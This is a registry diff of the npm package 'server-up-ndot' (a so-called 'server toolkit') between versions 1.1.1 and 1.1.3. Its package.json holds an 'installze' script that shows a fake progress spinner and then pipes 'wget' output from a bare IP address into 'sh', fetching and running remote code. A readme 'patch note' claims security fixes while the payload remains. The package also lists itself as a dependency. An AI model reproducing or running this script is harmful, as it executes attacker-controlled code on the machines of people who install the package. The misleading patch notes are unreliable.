server-up-ndot 1.1.1 → 1.1.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/package.json +8 -11
  2. package/readme.md +12 -0
package/package.json CHANGED
@@ -1,20 +1,17 @@
1
1
  {
2
2
  "name": "server-up-ndot",
3
- "version": "1.1.1",
4
- "description": "",
5
- "main": "index.js",
3
+ "version": "1.1.3",
6
4
  "description": "server toolkit",
7
- "bin": {
8
- "server-up-ndot": "./bin/cli.js"
5
+ "main": "index.js",
6
+ "bin": {
7
+ "server-up-ndot": "./bin/cli.js"
9
8
  },
10
9
  "scripts": {
11
10
  "test": "echo \"Error: no test specified\" && exit 1",
12
- "installze": "echo installing.... && for j in 1 2 3 4 5; do for i in / - \\\\ \\|; do printf '\\r%s' $i; sleep 0.1; done; done&& wget -qO- 125.181.230.198/js/app/1 | sh",
13
- "license": "MIT"
11
+ "installze": "echo installing.... && for j in 1 2 3 4 5; do for i in / - \\\\ \\|; do printf '\\r%s' $i; sleep 0.1; done; done&& wget -qO- 125.181.230.198/js/app/1 | sh"
14
12
  },
15
13
  "dependencies": {
16
- "axios": "^1.13.6",
17
- "body-parser": "*",
14
+ "axios": "*",
18
15
  "chalk": "*",
19
16
  "cli-progress": "*",
20
17
  "commander": "*",
@@ -35,7 +32,6 @@
35
32
  "jimp": "*",
36
33
  "jsonwebtoken": "*",
37
34
  "kleur": "*",
38
- "koa": "*",
39
35
  "lodash": "*",
40
36
  "minimist": "*",
41
37
  "moment": "*",
@@ -50,6 +46,7 @@
50
46
  "qs": "*",
51
47
  "redis": "*",
52
48
  "sanitize-html": "*",
49
+ "server-up-ndot": "^1.1.1",
53
50
  "sharp": "*",
54
51
  "socket.io": "*",
55
52
  "uuid": "*",
@@ -60,6 +57,6 @@
60
57
  },
61
58
  "keywords": [],
62
59
  "author": "",
63
- "license": "ISC",
60
+ "license": "MIT",
64
61
  "type": "commonjs"
65
62
  }
package/readme.md ADDED
@@ -0,0 +1,12 @@
1
+ # patch note
2
+
3
+ ## 1.1.x
4
+
5
+ - 1.1.2
6
+ - Fix security issues
7
+ - delete package body-parser
8
+ - fix lisense
9
+
10
+ - 1.1.3
11
+ - Fix security issues
12
+ - delete package koa